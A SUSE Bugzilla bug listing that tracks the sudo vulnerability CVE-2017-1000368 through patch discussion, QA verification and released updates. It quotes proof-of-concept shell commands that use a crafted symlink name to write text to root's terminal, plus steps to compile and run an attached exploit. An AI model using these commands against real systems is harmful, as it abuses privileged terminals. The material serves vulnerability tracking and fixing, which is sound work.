|
Bugzilla – Full Text Bug Listing |
| Summary: | VUL-0: CVE-2017-1000368: sudo: path traversal race conditions, follow up problem | ||
|---|---|---|---|
| Product: | [Novell Products] SUSE Security Incidents | Reporter: | Marcus Meissner <meissner> |
| Component: | Incidents | Assignee: | Security Team bot <security-team> |
| Status: | RESOLVED FIXED | QA Contact: | Security Team bot <security-team> |
| Severity: | Major | ||
| Priority: | P2 - High | CC: | astieger, bhavel, christos.varelas, forgotten_y-Bqn7eYAj, heiko.rommel, jsegitz, kstreitova, meissner, mpluskal, mrueckert, rosuna, simonf.lees, tchvatal, vcizek, vpelcak |
| Version: | unspecified | ||
| Target Milestone: | --- | ||
| Hardware: | Other | ||
| OS: | Other | ||
| URL: | https://smash.suse.de/issue/185360/ | ||
| Whiteboard: | CVSSv2:SUSE:CVE-2017-1000368:7.2:(AV:L/AC:L/Au:N/C:C/I:C/A:C) CVSSv3:SUSE:CVE-2017-1000368:8.4:(AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) CVSSv2:NVD:CVE-2017-1000368:7.2:(AV:L/AC:L/Au:N/C:C/I:C/A:C) CVSSv3:SUSE:CVE-2017-1000368:7.8:(AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) CVSSv3:RedHat:CVE-2017-1000368:7.8:(AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) | ||
| Found By: | --- | Services Priority: | |
| Business Priority: | Blocker: | --- | |
| Marketing QA Status: | --- | IT Deployment: | --- |
| Bug Depends on: | 1039361 | ||
| Bug Blocks: | |||
| Attachments: | QA reproducer | ||
|
Description
Marcus Meissner
2017-06-01 09:56:04 UTC
The upstream patch from 1.8.20p1 searches recursively only search_devs[]. If a device is not found there, sudo_ttyname_scan() then doesn't descend into directories when it browses the rest of /dev. The patch we use in SLE-12/Leap adds /dev/shm and /dev/mqueue to ignore_devs[]. So when sudo does the BFS /dev scan for the tty device, they aren't searched at all, which prevents the symlink trickery from the Qualys exploit. On Fri, Jun 02, 2017 at 12:55:10PM -0600, Todd C. Miller wrote: > However, the arbitrary tty access IS exploitable in 1.8.20p1. For example, against Sudo < 1.8.20p1: $ /usr/bin/sudo -l ... User john may run the following commands on localhost: (nobody) /usr/bin/sum $ ln -s /usr/bin/sudo ' 1026 ' (1026 is tty2, currently used by root) $ ./' 1026 ' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n' (this is written to root's tty2) Or, against Sudo = 1.8.20p1: $ ln -s /usr/bin/sudo $') 1026 \n' $ ./$') 1026 \n' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n' CVE-2017-1000368 was assigned to this newline vulnerability: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000368 With best regards, -- the Qualys Security Advisory team I can confirm that our packages are vulnerable to this new attack vector. Created attachment 727965 [details]
QA reproducer
QA, to reproduce:
- Install selinux-policy-minimum
- boot with security=selinux selinux=1 enforcing=0
- get the path of the root's terminal with:
# tty
- now as the sudo user on a different terminal:
$ cc CVE-2017-1000368.c -o CVE-2017-1000368 -lutil
$ ./CVE-2017-1000368 <PATH_TO_ROOT_TTY>
If affected, on the root's tty will appear:
/usr/bin/sum: unrecognized option '--
HELLO
WORLD
'
Try '/usr/bin/sum --help' for more information.
This is already fixed in tumbleweed, the newer patch was already available there so I used that. (In reply to Simon Lees from comment #5) > This is already fixed in tumbleweed, the newer patch was already available > there so I used that. The "newer patch" (from bug 1039361 comment 23) is just a different approach to fix CVE-2017-100037. This bug (CVE-2017-100038) is fixed by https://www.sudo.ws/repos/sudo/rev/9ad60fe663e5. Anyway, Michael Stroeder fixed Tumbleweed by the update to 1.8.20p2 In home:simotek:branches:OBS_Maintained:sudo/sudo.SUSE_SLE-12-SP2_Update, you're backporting a wrong patch. The one we have there is sufficient to fix CVE-2017-100037, just add the commit mentioned above. (In reply to Vítězslav Čížek from comment #6) > to fix CVE-2017-100037. > This bug (CVE-2017-100038) is fixed by Sorry, the numbers above should read CVE-2017-1000367 and CVE-2017-1000368 respectively Kristyna, Please update sudo in SLE-12-SP3. Otherwise all other codestreams are fixed. (In reply to Vítězslav Čížek from comment #11) > Kristyna, > Please update sudo in SLE-12-SP3. Otherwise all other codestreams are fixed. Sudo in SLE-12-SP3 was updated to 1.8.20p2 (sr#134136). It seems that everything is fixed here. Reassigning it back to the security team. Is version 1.7.X also affected? (SLES 11 SP3 LTSS, for instance) In that case, I'll open a separate bug requesting a PTF. Thanks! No, both CVE-2017-1000367 and CVE-2017-1000368 affect only the 1.8 branch of sudo. See https://www.sudo.ws/alerts/linux_tty.html Just versions 1.8.5-1.8.20p2 are vulnerable. SUSE-SU-2017:1626-1: An update that solves one vulnerability and has one errata is now available. Category: security (important) Bug References: 1034560,1042146 CVE References: CVE-2017-1000368 Sources used: SUSE Linux Enterprise Software Development Kit 12-SP2 (src): sudo-1.8.10p3-10.10.2 SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src): sudo-1.8.10p3-10.10.2 SUSE Linux Enterprise Server 12-SP2 (src): sudo-1.8.10p3-10.10.2 SUSE Linux Enterprise Desktop 12-SP2 (src): sudo-1.8.10p3-10.10.2 OpenStack Cloud Magnum Orchestration 7 (src): sudo-1.8.10p3-10.10.2 SUSE-SU-2017:1627-1: An update that solves one vulnerability and has one errata is now available. Category: security (important) Bug References: 1034560,1042146 CVE References: CVE-2017-1000368 Sources used: SUSE OpenStack Cloud 6 (src): sudo-1.8.10p3-2.16.1 SUSE Linux Enterprise Server for SAP 12-SP1 (src): sudo-1.8.10p3-2.16.1 SUSE Linux Enterprise Server for SAP 12 (src): sudo-1.8.10p3-2.16.1 SUSE Linux Enterprise Server 12-SP1-LTSS (src): sudo-1.8.10p3-2.16.1 SUSE Linux Enterprise Server 12-LTSS (src): sudo-1.8.10p3-2.16.1 openSUSE-SU-2017:1697-1: An update that solves one vulnerability and has one errata is now available. Category: security (important) Bug References: 1034560,1042146 CVE References: CVE-2017-1000368 Sources used: openSUSE Leap 42.2 (src): sudo-1.8.10p3-9.6.1 released |